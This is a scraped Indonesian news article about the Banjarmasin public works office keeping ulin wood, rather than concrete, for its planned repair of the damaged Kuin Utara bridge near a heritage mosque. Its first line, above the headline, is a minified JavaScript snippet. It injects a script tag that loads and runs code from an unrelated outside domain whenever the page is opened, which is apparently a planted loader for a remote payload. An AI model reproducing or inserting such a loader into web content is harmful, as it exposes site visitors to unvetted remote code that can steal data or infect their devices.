(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Dalih PUPR Banjarmasin Pertahankan Material Ulin Jembatan Kuin Utara


KANALKALIMANTAN.COM, BANJARMASIN – Jembatan ulin yang terletak di jalan Kuin Utara RT 04 RW 02, Kelurahan Kuin Utara, Kecamatan Banjarmasin Utara, Kota Banjarmasin atau dekat Mesjid Sultan Suriansyah direncanakan diperbaiki pada tahun 2023.

Mengingat kondisi kerusakannya yang semakin parah, banyak pagar dan lantai jembatan yang copot serta mengeluarkan bunyi berisik ketika dilewati pengendara.

Dinas PUPR Banjarmasin melalui Sub Kordinator Jembatan bidan Jembatan dan Jalan, Ir Damayanti mengatakan pihaknya telah memasukan rencana perbaikan jembatan Kuin Utara pada tahun anggaran 2023, akan tetapi masih menunggu persetujuan.

Namun, dalam rencana perbaikan nanti Dinas Pekerjaan Umum dan Perumahan Rakyat (PUPR) Banjarmasin dikatakan tetap akan memakai desain lama jembatan yang menggunakan material kayu ulin.

Baca juga: PLN Gerak Cepat Lakukan Pemulihan Pasca Gangguan Sistem Interkoneksi Kalimantan

“Masih seperti yang semula, masih berupa kayu ulin,” kata Sub Kordinator Jembatan, Ir Damayanti, Selasa (8/8/2023) siang.

Alasan pihaknya tetap akan menggunakan material ulin dikarenakan waktu yang mepet menjelang akhir tahun, sehingga tidak dimungkinkan untuk menggunakan bahan permanen seperti beton.

“Kalau mau penanganan cepat ya itu, kalau beton lama prosesnya, ini kan sudah akhir tahun tidak mungkin kita mengganti dengan yang permanen,” ucapnya.

Baca juga: Motif Sepele Pengroyokan di Jalan Veteran Banjarmasin Hingga Tewaskan Ferdy

Kemudian, pihaknya menilai jembatan tersebut perlu dipertahankan keasliannya sebab berada di kawasan cagar budaya Masjid Sultan Suriansyah.

Biaya perbaikan jembatan ulin yang membelah anak sungai Kuin tersebut dikatakan dianggarkan tidak terlalu besar, berada di bawah angka Rp1 miliar.

“Anggarannya di bawah satu miliar,” ungkap Damayanti.

Pihaknya berharap pengajuan anggaran perbaikan jembatan ulin tersebut cepat disetujui oleh DPRD Banjarmasin agar perbaikan tidak molor ke tahun 2024.

Baca juga: Mati Listrik Berjam-Jam, PLN Kalselteng Jelaskan Penyebabnya

Lanjut Damayanti, kondisi sejumlah jembatan ulin yang ada di Kota Banjarmasin masih terbilang layak, kecuali yang berada di jalan Kuin Utara.

“Kita punya satu jembatan ulin yang paling besar di Sungai Gampa kondisinya masih lumayan, bisa dipertahankan,” kata Damayanti.

Saat ini, pihaknya juga belum ada rencana untuk memodernkan semua jembatan ulin yang ada di Kota Banjarmasin dengan alasan mempertahankan keaslian jembatan.

“Sayang keasliannya yang khas Banjarmasin,” pungkasnya. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

5 menit ago

Wagub Edy Pratowo Maju Pilkada Kalteng, Siap Dipasang Posisi Apapun

KANALKALIMANTAN.COM, PALANGKARAYA - Wakil Gubernur (Wagub) Kalimantan Tengah (Kalteng), Edy Pratowo, mengumumkan keputusannya untuk mendaftarkan… Read More

33 menit ago

Target Juara Umum Popda Kalsel 2024, Aditya Janji Beri Bonus Pribadi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin melepas 109 atlet untuk berlaga dalam… Read More

1 jam ago

Ancaman Banjir Rob di Pesisir Kalsel saat Fase Bulan Baru

KANALKALIMANTAN.COM, BANJARMASIN - Stasiun Meteorologi (Statmet) Syamsudin Noor Banjarmasin mengeluarkan imbauan mengenai potensi banjir pesisir… Read More

1 jam ago

PKS Banjarbaru Buka Penjaringan, Siap Koalisi Tawarkan Kader Sendiri

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pimpinan Darah Partai Keadilan Sejahtera (PKS) Kota Banjarbaru membuka pendaftaran bakal… Read More

3 jam ago

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

17 jam ago

This website uses cookies.